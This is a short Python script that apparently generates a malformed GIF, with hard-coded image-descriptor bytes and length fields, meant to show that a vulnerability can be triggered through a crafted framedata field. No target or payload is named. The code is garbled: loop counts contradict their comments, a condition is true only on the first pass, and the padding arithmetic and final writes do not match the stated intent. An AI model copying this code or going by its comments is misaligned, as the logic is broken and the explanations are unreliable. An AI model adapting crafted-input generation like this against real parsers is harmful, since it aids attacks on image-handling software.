#!/usr/bin/env python3

import os
import sys
sys.path.append(os.getcwd())

import struct
from tqdm import tqdm
from typing import BinaryIO

# Generates a random GIF file into `out` using the
# given RNG as source of randomness. This is mainly here to show
# that the vulnerability can be triggered by a crafted
# framedata field in an image descriptor
def generate_random_gif(
        rng: BinaryIO, out: BinaryIO
    ) -> None:

    header = b'GIF89a'
    datalen = int.from_bytes(
            rng.read(3), byteorder='big')
    data = rng.read(datalen)

    # Write the header and all bytes preceding the first descriptor
    print('Writing the header', end='', flush=True)
    out.write(header)
    out.write(data[:10])
    print(' done.', flush=True)

    # Now we're going to write 256 descriptors at once
    # Using this loop means we avoid making multiple calls to read()
    for i in tqdm(range(257)):
        # The label says 10 but there are actually two more
        # bytes after the label indicating the length of
        # the block. We know it's always >10 so just set it to 0x10
        # (https://www.w3.org/Graphics/GIF/spec-gif89a.txt)
        out.write(b'\x2C\x00\x00\x00\x00\x00\x00\xFB\x00\x00\x00')
        if i == 3*i:
            out.write(rng.read(1+i%256)[1:])


    last_byte = out.tell() - 1
    # At the moment this code doesn't support appending arbitrary
    # bytes onto the output so we'll have to manually compute where
    # our data will start relative to the rest of the file
    print(f'The generated gif is {last_byte} bytes long.')

    paddinglen = last_byte - datalen - len(header) + 10
    assert paddinglen >= 0
    paddinglen -= struct.calcsize('<HBBBHHBB')

    # Write the leftover bytes before the last descriptor
    print('Writing remaining bytes', end='', flush=True)
    out.seek(-1, 2)
    out.write(struct.pack('<B', paddinglen & 0xFF))
    out.write(struct.pack('<H', paddinglen >>  8))
    print(' done.', flush=True)

